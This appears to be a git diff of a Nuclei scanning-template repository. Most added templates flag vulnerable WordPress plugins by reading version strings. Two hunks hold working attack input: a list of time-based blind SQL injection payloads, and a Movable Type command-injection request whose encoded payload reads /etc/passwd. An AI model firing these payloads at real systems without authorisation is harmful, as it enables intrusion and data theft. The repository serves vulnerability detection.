./poc/wordpress/wp-todo-f733a9daca6b1314d02c4c4685344788.yaml diff --git a/poc/auth/BlindSQLAuth.yaml b/poc/auth/BlindSQLAuth.yaml index ce5d86554b..6fd8c3c79a 100644 --- a/poc/auth/BlindSQLAuth.yaml +++ b/poc/auth/BlindSQLAuth.yaml @@ -1,33 +1,33 @@ -id: time-based-sqli -info: - name: Time-Based Blind SQL Injection - author: KhukuriRimal - severity: Critical - description: Detects time-based blind SQL injection vulnerability -http: - - method: GET - path: - - "{{BaseURL}}" - payloads: - injection: - - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" - - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" - - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" - - "if(now()=sysdate(),SLEEP(7),0)" - - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" - - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" - - "XOR(if(now()=sysdate(),sleep(7),0))XOR" - - "1%20AND%201337%3d(SELECT%201337%20FROM%20PG_SLEEP(7))--%201337" - fuzzing: - - part: query - type: replace - mode: single - fuzz: - - "{{injection}}" - stop-at-first-match: true - matchers: - - type: dsl - dsl: - - "status_code == 200" - - "duration>=7 && duration <=16" - condition: and \ No newline at end of file +id: time-based-sqli +info: + name: Time-Based Blind SQL Injection + author: Coffinxp/lostsec + severity: Critical + description: Detects time-based blind SQL injection vulnerability +http: + - method: GET + path: + - "{{BaseURL}}" + payloads: + injection: + - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" + - "'%2b(select*from(select(sleep(7)))a)%2b'" + - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" + - "'XOR(if((select now()=sysdate()),sleep(7),0))XOR'Z" + - "X'XOR(if(now()=sysdate(),/**/sleep(7)/**/,0))XOR'X" + - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" + - "X'XOR(if(now()=sysdate(),(sleep((((7))))),0))XOR'X" + - "if(now()=sysdate(),SLEEP(7),0)" + - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" + - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{injection}}" + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - "duration>=7 && duration <=16" diff --git "a/poc/cve/CVE-2021\342\200\22320837.yaml" "b/poc/cve/CVE-2021\342\200\22320837.yaml" index d9fa45c868..ab208a01bc 100644 --- "a/poc/cve/CVE-2021\342\200\22320837.yaml" +++ "b/poc/cve/CVE-2021\342\200\22320837.yaml" @@ -1,23 +1,42 @@ id: CVE-2021-20837 info: - name: RCE in MovableType - author: zin_min_phyo - severity: critical - reference: https://nemesis.sh/posts/movable-type-0day/ - tags: MovableType,RCE + name: Movable Type XMLRPC API vulnerable to OS command injection + author: Min Won + description: Movable Type 7 r.5002 and earlier (Movable Type 7 Series), Movable Type 6.8.2 and earlier (Movable Type 6 Series), Movable Type Advanced 7 r.5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8.2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. Note that all versions of Movable Type 4.0 or later including unsupported (End-of-Life, EOL) versions are also affected by this vulnerability. Crd --> Orginal Researcher.. + reference: https://nvd.nist.gov/vuln/detail/CVE-2021-20837 + severity: high + tags: cve,cve2021,rce requests: - - method: POST - path: - - "{{BaseURL}}/cgi-bin/mt/mt-xmlrpc.cgi" + - raw: + - | + POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1 + Host: {{Hostname}} + User-Agent: POC + Accept: */* + Content-Length: 198 + Connection: close + Content-Type: text/xml + + + + mt.handler_to_coderef + + + + + YGNhdCAvZXRjL3Bhc3N3ZGA= + + + + + - body: 'mt.handler_to_coderefYGNhdCAvZXRjL3Bhc3N3ZGA=' - - - + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" part: body + diff --git a/poc/cve/CVE-2022-2440-d3549549b7d1d1f9c5181225b19ec097.yaml b/poc/cve/CVE-2022-2440-d3549549b7d1d1f9c5181225b19ec097.yaml new file mode 100644 index 0000000000..93b0c70b18 --- /dev/null +++ b/poc/cve/CVE-2022-2440-d3549549b7d1d1f9c5181225b19ec097.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-2440-d3549549b7d1d1f9c5181225b19ec097 + +info: + name: > + Theme Editor <= 2.8 - Authenticated (Admin+) PHAR Deserialization + author: topscoder + severity: low + description: > + The Theme Editor plugin for WordPress is vulnerable to deserialization of untrusted input via the 'images_array' parameter in versions up to, and including 2.8. This makes it possible for authenticated attackers with administrative privileges to call files using a PHAR wrapper that will deserialize and call arbitrary PHP Objects that can be used to perform a variety of malicious actions granted a POP chain is also present. It also requires that the attacker is successful in uploading a file with the serialized payload. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/88fe46bf-8e85-4550-92ad-bdd426e5a745?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-2440 + metadata: + fofa-query: "wp-content/plugins/theme-editor/" + google-query: inurl:"/wp-content/plugins/theme-editor/" + shodan-query: 'vuln:CVE-2022-2440' + tags: cve,wordpress,wp-plugin,theme-editor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/theme-editor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "theme-editor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8') \ No newline at end of file diff --git a/poc/cve/CVE-2022-46858-0447202dcc657f8b5ce7f72ec5cf2c5e.yaml b/poc/cve/CVE-2022-46858-0447202dcc657f8b5ce7f72ec5cf2c5e.yaml new file mode 100644 index 0000000000..26061f62b7 --- /dev/null +++ b/poc/cve/CVE-2022-46858-0447202dcc657f8b5ce7f72ec5cf2c5e.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-46858-0447202dcc657f8b5ce7f72ec5cf2c5e + +info: + name: > + Product Specifications for Woocommerce <= 0.6.0 - Reflected Cross-Site Scripting via Arbitrary Query String Parameter + author: topscoder + severity: medium + description: > + The Product Specifications for Woocommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the arbitrary query string parameters in versions up to, and including, 0.6.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/916d4f2f-769b-4902-9464-f55d8f64c9d2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-46858 + metadata: + fofa-query: "wp-content/plugins/product-specifications/" + google-query: inurl:"/wp-content/plugins/product-specifications/" + shodan-query: 'vuln:CVE-2022-46858' + tags: cve,wordpress,wp-plugin,product-specifications,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/product-specifications/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "product-specifications" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.6.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-1056-67c2890890023e1dcaf3fcf02b7286ad.yaml b/poc/cve/CVE-2024-1056-67c2890890023e1dcaf3fcf02b7286ad.yaml new file mode 100644 index 0000000000..8810530518 --- /dev/null +++ b/poc/cve/CVE-2024-1056-67c2890890023e1dcaf3fcf02b7286ad.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-1056-67c2890890023e1dcaf3fcf02b7286ad + +info: + name: > + Funnel Kit Funnel Builder PRO <= 3.4.5 Authenticated(Contributor+) Stored Cross-Site Scripting via allow_iframe_tag_in_post + author: topscoder + severity: low + description: > + The FunnelKit Funnel Builder Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'allow_iframe_tag_in_post' function which uses the 'wp_kses_allowed_html' filter to globally allow script and iframe tags in posts in all versions up to, and including, 3.4.5. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2fbacaf2-0b3e-4d1e-adc3-c501a6c4c816?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-1056 + metadata: + fofa-query: "wp-content/plugins/funnel-builder-pro/" + google-query: inurl:"/wp-content/plugins/funnel-builder-pro/" + shodan-query: 'vuln:CVE-2024-1056' + tags: cve,wordpress,wp-plugin,funnel-builder-pro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/funnel-builder-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "funnel-builder-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.4.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-1384-a9a20a9963188caf2d7ca5d11ff8354e.yaml b/poc/cve/CVE-2024-1384-a9a20a9963188caf2d7ca5d11ff8354e.yaml new file mode 100644 index 0000000000..37a964a542 --- /dev/null +++ b/poc/cve/CVE-2024-1384-a9a20a9963188caf2d7ca5d11ff8354e.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-1384-a9a20a9963188caf2d7ca5d11ff8354e + +info: + name: > + Premium Portfolio Features for Phlox theme <= 2.3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Premium Portfolio Features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'aux_recent_portfolios_grid' shortcode in all versions up to, and including, 2.3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4475cbd4-07cf-499a-a11a-b63eb9184568?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-1384 + metadata: + fofa-query: "wp-content/plugins/auxin-portfolio/" + google-query: inurl:"/wp-content/plugins/auxin-portfolio/" + shodan-query: 'vuln:CVE-2024-1384' + tags: cve,wordpress,wp-plugin,auxin-portfolio,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/auxin-portfolio/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "auxin-portfolio" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-2541-49857937876d85d5d1abd5bfb380cf51.yaml b/poc/cve/CVE-2024-2541-49857937876d85d5d1abd5bfb380cf51.yaml new file mode 100644 index 0000000000..a1dae36f04 --- /dev/null +++ b/poc/cve/CVE-2024-2541-49857937876d85d5d1abd5bfb380cf51.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-2541-49857937876d85d5d1abd5bfb380cf51 + +info: + name: > + Popup Builder <= 4.3.3 - Sensitive Information Exposure via Imported Subscribers CSV File + author: topscoder + severity: medium + description: > + The Popup Builder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.3 via the Subscribers Import feature. This makes it possible for unauthenticated attackers to extract sensitive data after an administrator has imported subscribers via a CSV file. This data may include the first name, last name, e-mail address, and potentially other personally identifiable information of subscribers. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/086cd6a0-adb6-4e12-b34c-630297f036f3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-2541 + metadata: + fofa-query: "wp-content/plugins/popup-builder/" + google-query: inurl:"/wp-content/plugins/popup-builder/" + shodan-query: 'vuln:CVE-2024-2541' + tags: cve,wordpress,wp-plugin,popup-builder,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/popup-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "popup-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.3.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-3282-c2b556dd2eaeb747bc64cf55c4abafd6.yaml b/poc/cve/CVE-2024-3282-c2b556dd2eaeb747bc64cf55c4abafd6.yaml new file mode 100644 index 0000000000..ecb62a19ce --- /dev/null +++ b/poc/cve/CVE-2024-3282-c2b556dd2eaeb747bc64cf55c4abafd6.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-3282-c2b556dd2eaeb747bc64cf55c4abafd6 + +info: + name: > + WP Table Builder <= 1.5.0 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The WP Table Builder – WordPress Table Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f41b8d18-4a20-4b99-b375-3fafb41030ee?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-3282 + metadata: + fofa-query: "wp-content/plugins/wp-table-builder/" + google-query: inurl:"/wp-content/plugins/wp-table-builder/" + shodan-query: 'vuln:CVE-2024-3282' + tags: cve,wordpress,wp-plugin,wp-table-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-table-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-table-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-3679-027fedcab741a41badcd943e1f2670dd.yaml b/poc/cve/CVE-2024-3679-027fedcab741a41badcd943e1f2670dd.yaml new file mode 100644 index 0000000000..5395efa449 --- /dev/null +++ b/poc/cve/CVE-2024-3679-027fedcab741a41badcd943e1f2670dd.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-3679-027fedcab741a41badcd943e1f2670dd + +info: + name: > + Premium SEO Pack – WP SEO Plugin <= 1.6.001 - Unauthenticated Information Exposure + author: topscoder + severity: medium + description: > + The Premium SEO Pack – WP SEO Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.6.001. This makes it possible for unauthenticated attackers to view limited information from password protected posts through the social meta data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ccb65de5-bfb5-47db-87c9-ad46e65924b8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-3679 + metadata: + fofa-query: "wp-content/plugins/premium-seo-pack/" + google-query: inurl:"/wp-content/plugins/premium-seo-pack/" + shodan-query: 'vuln:CVE-2024-3679' + tags: cve,wordpress,wp-plugin,premium-seo-pack,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/premium-seo-pack/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "premium-seo-pack" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6.001') \ No newline at end of file diff --git a/poc/cve/CVE-2024-37540-41966b5363ceb49c1002bf890479040a.yaml b/poc/cve/CVE-2024-37540-41966b5363ceb49c1002bf890479040a.yaml new file mode 100644 index 0000000000..c21d49b695 --- /dev/null +++ b/poc/cve/CVE-2024-37540-41966b5363ceb49c1002bf890479040a.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-37540-41966b5363ceb49c1002bf890479040a + +info: + name: > + Leaky Paywall <= 4.21.2 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The Leaky Paywall plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.21.2. This is due to missing or incorrect nonce validation on the process_level_deleted function. This makes it possible for unauthenticated attackers to modify plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3fc94760-d64b-48e1-b2bd-40cedcf48340?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-37540 + metadata: + fofa-query: "wp-content/plugins/leaky-paywall/" + google-query: inurl:"/wp-content/plugins/leaky-paywall/" + shodan-query: 'vuln:CVE-2024-37540' + tags: cve,wordpress,wp-plugin,leaky-paywall,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/leaky-paywall/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "leaky-paywall" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.21.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-37921-32c9b35565d965fce9f085fa275f2788.yaml b/poc/cve/CVE-2024-37921-32c9b35565d965fce9f085fa275f2788.yaml new file mode 100644 index 0000000000..250b41420f --- /dev/null +++ b/poc/cve/CVE-2024-37921-32c9b35565d965fce9f085fa275f2788.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-37921-32c9b35565d965fce9f085fa275f2788 + +info: + name: > + Chained Quiz <= 1.3.2.8 - Missing Authorization + author: topscoder + severity: high + description: > + The Chained Quiz plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the finalize() function in all versions up to, and including, 1.3.2.8. This makes it possible for unauthenticated attackers to answer quizzes that require logging in. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/69bc3b17-87fd-4e69-b769-85bbf13b214e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-37921 + metadata: + fofa-query: "wp-content/plugins/chained-quiz/" + google-query: inurl:"/wp-content/plugins/chained-quiz/" + shodan-query: 'vuln:CVE-2024-37921' + tags: cve,wordpress,wp-plugin,chained-quiz,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/chained-quiz/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "chained-quiz" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.2.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-3944-1cac4b0f9145e2f8f8e951e09918d457.yaml b/poc/cve/CVE-2024-3944-1cac4b0f9145e2f8f8e951e09918d457.yaml new file mode 100644 index 0000000000..c010530364 --- /dev/null +++ b/poc/cve/CVE-2024-3944-1cac4b0f9145e2f8f8e951e09918d457.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-3944-1cac4b0f9145e2f8f8e951e09918d457 + +info: + name: > + WP To Do <= 1.3.0 - Authenticated (Admin+) Stored Cross-Site Scripting via Task Comments + author: topscoder + severity: low + description: > + The WP To Do plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Comment in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b36b9b8a-41b0-4b57-92c7-5acebe2b0bae?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-3944 + metadata: + fofa-query: "wp-content/plugins/wp-todo/" + google-query: inurl:"/wp-content/plugins/wp-todo/" + shodan-query: 'vuln:CVE-2024-3944' + tags: cve,wordpress,wp-plugin,wp-todo,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-todo/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-todo" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-39638-69edc4c284df671b2ba465627be06431.yaml b/poc/cve/CVE-2024-39638-69edc4c284df671b2ba465627be06431.yaml new file mode 100644 index 0000000000..cc62b93394 --- /dev/null +++ b/poc/cve/CVE-2024-39638-69edc4c284df671b2ba465627be06431.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-39638-69edc4c284df671b2ba465627be06431 + +info: + name: > + Registrations for the Events Calendar – Event Registration Plugin <= 2.12.2 - Authenticated (Contributor+) SQL Injection + author: topscoder + severity: low + description: > + The Registrations for the Events Calendar – Event Registration Plugin plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 2.12.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/26e35c4a-79ec-4742-8004-1c799d2c56ff?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.9 + cve-id: CVE-2024-39638 + metadata: + fofa-query: "wp-content/plugins/registrations-for-the-events-calendar/" + google-query: inurl:"/wp-content/plugins/registrations-for-the-events-calendar/" + shodan-query: 'vuln:CVE-2024-39638' + tags: cve,wordpress,wp-plugin,registrations-for-the-events-calendar,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/registrations-for-the-events-calendar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "registrations-for-the-events-calendar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.12.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43915-77573ddf79e044c9a0d67924130e634b.yaml b/poc/cve/CVE-2024-43915-77573ddf79e044c9a0d67924130e634b.yaml new file mode 100644 index 0000000000..9539109316 --- /dev/null +++ b/poc/cve/CVE-2024-43915-77573ddf79e044c9a0d67924130e634b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43915-77573ddf79e044c9a0d67924130e634b + +info: + name: > + Zephyr Project Manager <= 3.3.102 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Zephyr Project Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 3.3.102 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/33bf39f8-6f56-4089-bb46-5d401af72953?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L + cvss-score: 5.5 + cve-id: CVE-2024-43915 + metadata: + fofa-query: "wp-content/plugins/zephyr-project-manager/" + google-query: inurl:"/wp-content/plugins/zephyr-project-manager/" + shodan-query: 'vuln:CVE-2024-43915' + tags: cve,wordpress,wp-plugin,zephyr-project-manager,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/zephyr-project-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "zephyr-project-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3.102') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43916-1015b08d9eca60e9a1481bb46ac69da5.yaml b/poc/cve/CVE-2024-43916-1015b08d9eca60e9a1481bb46ac69da5.yaml new file mode 100644 index 0000000000..24b039fb47 --- /dev/null +++ b/poc/cve/CVE-2024-43916-1015b08d9eca60e9a1481bb46ac69da5.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43916-1015b08d9eca60e9a1481bb46ac69da5 + +info: + name: > + Zephyr Project Manager <= 3.3.102 - Missing Authorization to Authenticated (Subscriber+) Status Updates + author: topscoder + severity: low + description: > + The Zephyr Project Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the via the 'create_status‘, ‘update_status‘, and ‘delete_status‘ functions in all versions up to, and including, 3.3.102. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update statuses. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6746d20c-d528-4c69-95e4-9f22d6460463?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43916 + metadata: + fofa-query: "wp-content/plugins/zephyr-project-manager/" + google-query: inurl:"/wp-content/plugins/zephyr-project-manager/" + shodan-query: 'vuln:CVE-2024-43916' + tags: cve,wordpress,wp-plugin,zephyr-project-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/zephyr-project-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "zephyr-project-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3.102') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43917-4df54e0a00866edc142ed2d2dc516949.yaml b/poc/cve/CVE-2024-43917-4df54e0a00866edc142ed2d2dc516949.yaml new file mode 100644 index 0000000000..f664f07978 --- 